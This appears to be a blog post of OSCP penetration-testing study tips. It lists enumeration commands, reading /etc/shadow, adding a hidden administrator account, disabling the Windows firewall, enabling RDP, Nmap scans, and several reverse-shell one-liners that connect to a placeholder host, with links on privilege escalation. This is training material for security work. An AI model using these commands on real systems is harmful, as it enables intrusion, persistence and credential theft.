OSCP Tips and Tricks

Here is a grouped list of things that helped me during my OSCP course. This is just the tip of the iceberg of what commands you'll need to know. However, I used these commands a lot. I'm not going to go into details on what command does what. You should be able to figure it out or already know it.

Linux Commands:

uname -a
hostname
id
ifconfig -a
cat /etc/network/interfaces
cat /etc/passwd
cat /etc/shadow
wget
fetch
ftp
nc -nlvp {port}
python -c "import pty; pty.spawn('/bin/bash')"
Windows Commands:

ipconfig -a
net user /add {username} {password}
net localgroup administrators {username} /add
type {filename.txt}
netsh firewall set opmode disable
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Metasploit:

set AUTORUNSCRIPT migrate -f
Nmap:

nmap -A -p- {IP}
nmap -sV -sT -p- {IP}
nmap -sU -p- {IP}
nmap -O {IP}
Some Reverse Shell One-Liners:

bash -i >& /dev/tcp/{IP}/{Port} 0>&1
nc -e /bin/sh {IP} {Port}
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP} {Port} >/tmp/f
php -r '$sock=fsockopen("{IP}",{Port});exec("/bin/sh -i <&3 >&3 2>&3");'
See this website for more: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 

Blogs and Websites on Privilege Escalation:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
http://www.fuzzysecurity.com/tutorials/16.html
http://it-ovid.blogspot.ca/2012/02/windows-privilege-escalation.html
http://netsec.ws/?p=309

 

Useful Tools to Install in Kali:

sshuttle
proxychains-ng 
veil-evasion

 

 

Add new comment

Restricted HTML

  • Allowed HTML tags: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol start type> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id>
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.